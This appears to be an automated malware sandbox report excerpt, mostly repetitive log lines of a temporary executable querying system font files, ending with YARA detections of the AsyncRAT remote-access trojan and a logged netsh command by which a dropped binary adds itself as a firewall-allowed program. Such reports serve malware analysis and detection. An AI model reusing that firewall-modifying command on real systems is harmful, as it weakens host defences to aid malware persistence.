Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Code function: 2_2_049804AE GetUserNameW, 2_2_049804AE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00406278 GetVersionExA, 14_2_00406278
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Yara detected AsyncRAT
Source: Yara match File source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
Source: Yara match File source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Modifies the windows firewall
Source: C:\Users\user\AppData\Roaming\servieda.exe Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE
Uses netsh to modify the Windows network and firewall settings
